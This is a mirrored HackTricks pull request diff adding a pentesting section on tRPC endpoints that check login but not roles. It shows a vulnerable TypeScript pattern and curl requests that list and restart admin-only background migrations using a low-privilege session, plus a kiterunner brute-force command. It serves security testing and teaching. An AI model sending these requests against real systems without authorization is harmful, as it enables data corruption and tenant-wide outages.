mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1457 from HackTricks-wiki/update_How_An_Authorization_Flaw_Reveals_A_Common_Securit_20251001_125513
How An Authorization Flaw Reveals A Common Security Blind Sp...
This commit is contained in:
		
						commit
						ef576d4a32
					
				| @ -28,6 +28,53 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th | ||||
| - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing. | ||||
| - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions. | ||||
| 
 | ||||
| ### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls | ||||
| 
 | ||||
| Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`. | ||||
| 
 | ||||
| - Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control). | ||||
| - Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability. | ||||
| - Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`. | ||||
| 
 | ||||
| Example vulnerable pattern (no role/permission gate): | ||||
| 
 | ||||
| ```ts | ||||
| // The endpoint for retrying a migration job | ||||
| // This checks for a valid session (authentication) | ||||
| retry: protectedProcedure | ||||
|   // but not for an admin role (authorization). | ||||
|   .input(z.object({ name: z.string() })) | ||||
|   .mutation(async ({ input, ctx }) => { | ||||
|     // Logic to restart a sensitive migration | ||||
|   }), | ||||
| ``` | ||||
| 
 | ||||
| Practical exploitation (black-box) | ||||
| 
 | ||||
| 1) Register a normal account and obtain an authenticated session (cookies/headers). | ||||
| 2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures. | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{}}' | ||||
| ``` | ||||
| 
 | ||||
| 3) Invoke privileged actions such as restarting a job: | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{"name":"<migration_name>"}}' | ||||
| ``` | ||||
| 
 | ||||
| Impact to assess | ||||
| 
 | ||||
| - Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics). | ||||
| - DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages. | ||||
| 
 | ||||
| ### **Tools and Resources for API Pentesting** | ||||
| 
 | ||||
| - [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs. | ||||
| @ -53,8 +100,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 | ||||
| ## References | ||||
| 
 | ||||
| - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) | ||||
| - [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user